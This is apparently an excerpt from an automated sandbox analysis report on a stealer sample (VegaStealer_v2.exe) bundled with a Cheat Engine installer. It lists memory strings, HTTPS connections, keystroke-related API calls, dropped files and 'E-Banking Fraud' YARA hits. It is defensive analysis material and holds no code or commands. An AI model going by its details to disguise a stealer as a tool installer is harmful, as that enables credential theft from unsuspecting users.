                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/e
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/eu
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/eula
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/eula-avast-consumer-products
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/eula-avast-consumer-products2m
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/eula-avast-consumer-productshtmls/943/EN.pngipManage
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/p
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B23000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/privacy
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/privacy-policy#.
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.com/privacy-policyR/X
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avg.com/ww-en/eula
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avg.com/ww-en/privacy..$
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ccleaner.com/about/privacy-policy
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ccleaner.com/legal/end-use
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ccleaner.com/legal/end-usecense-agreem
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ccleaner.com/legal/end-user-license-agreement
                                  Source: CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cheatengine.org/privacy.htm
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cheatengine.org/privacy.htmd
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: CheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.innosetup.com/
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mcafee.com/consumer/en-us/X
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/global/legal.html
                                  Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D8C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.html
                                  Source: CheatEngine75.tmp, 00000008.00000003.2210401005.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2392056677.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D69000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.html4
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.htmlReplaced/OperaSetup.zipnet
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mcafee.com/consumer/en-us/policy/legal.htmles/969/EN.pngzipMSSP
                                  Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                  Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, History.txt.7.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                  Source: v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                  Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141458144.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nortonlifelock.com/us/en/legal/license-services-agreement/
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nortonlifelock.com/us/en/privacy/Op
                                  Source: v2.exe, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.opera.com/
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.opera.com/he/eula/computers
                                  Source: CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.opera.com/he/eula/computersl
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.opera.com/he/eula/computersmq
                                  Source: CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.opera.com/he/privacy
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CB6000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.premieropinion.com/common/termsofservice-v1
                                  Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.premieropinion.com/common/termsofservice-v1Replac
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005C90000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.premieropinion.com/privacy-policy
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.premieropinion.com/privacy-policy-
                                  Source: CheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.premieropinion.com/privacy-policyG
                                  Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.premieropinion.com/privacy-policyl
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.razer.com/legal/customer-privacy-policy
                                  Source: CheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.remobjects.com/ps
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/lang
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/lang_c
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: https://www.sqlite.org/lang_corefunc.html
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                                  Source: unknownHTTPS traffic detected: 172.67.160.84:443 -> 192.168.2.5:49704 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49705 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49706 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49710 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49712 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49716 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49720 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49726 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49737 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49743 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49749 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49759 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49766 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49772 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.226.4.166:443 -> 192.168.2.5:49778 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49784 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.148:443 -> 192.168.2.5:49793 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49838 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49849 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49873 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49887 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49896 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49903 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49911 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 18.66.161.123:443 -> 192.168.2.5:49920 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49921 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 65.9.108.93:443 -> 192.168.2.5:49943 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 3.165.135.3:443 -> 192.168.2.5:49951 version: TLS 1.2
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4F4E51 GetAsyncKeyState,GetAsyncKeyState,SendMessageW,8_2_6B4F4E51
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B4EFB99 SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,GetKeyState,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,MessageBeep,8_2_6B4EFB99

                                  E-Banking Fraud

                                  barindex
                                  Source: Yara matchFile source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

                                  System Summary

                                  barindex
